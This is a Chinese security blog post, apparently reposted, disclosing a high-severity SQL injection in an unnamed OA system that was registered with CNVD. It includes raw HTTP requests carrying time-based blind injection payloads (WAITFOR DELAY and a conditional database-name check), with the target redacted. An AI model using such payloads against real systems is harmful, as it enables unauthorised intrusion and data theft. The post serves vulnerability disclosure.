文章总结: 某OA系统存在高危SQL注入漏洞,攻击者可利用此漏洞获取敏感数据。文章提供了详细的漏洞复现步骤和POC验证方法,通过构造特定请求可触发数据库延迟响应,确认注入点存在。该漏洞已提交至CNVD并获得高危评级,相关系统管理员应尽快修复此安全风险以防止数据泄露。
综合评分: 68
文章分类: 漏洞分析,漏洞POC,漏洞预警,WEB安全,渗透测试
高危CNVD|OA存在SQL注入
原创
但求
天启攻防实验室
2025年10月23日 17:26
广东
CNVD CNNVD CVE CNNVD三级技术支撑单位等指导服务后台私聊。
CISP CISP-PTE/PTS NISP OSCP等考证私聊
团队承接各类安全业务,有兴趣合作的后台私聊
#
漏洞描述
某OA存在sql注入漏洞,攻击者可以利用此漏洞 ,获取敏感数据。
三、漏洞复现
复现一
Ip:http://xxxx:8088
(2)构造poc,如下,成功验证存在sql注入漏洞
POC:
GET /xxxx?id=1′;WAITFOR+DELAY+’0:0:2′–+—- HTTP/1.1
Host: xxx:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
(3)手工验证,睡眠2秒
当前数据库: ‘xx’
GET /xxx?id=1′;+IF+(SELECT+DB_NAME())+=+’xx’+WAITFOR+DELAY+’0:0:2′– HTTP/1.1
Host: xxx:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
当数据库为xx睡眠2秒 修改成其他 则不会睡眠,说明该系统确实存在sql注入漏洞
后续提交到CNVD,也成功下证了,给了个高危
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:天启攻防实验室 但求《高危CNVD|OA存在SQL注入》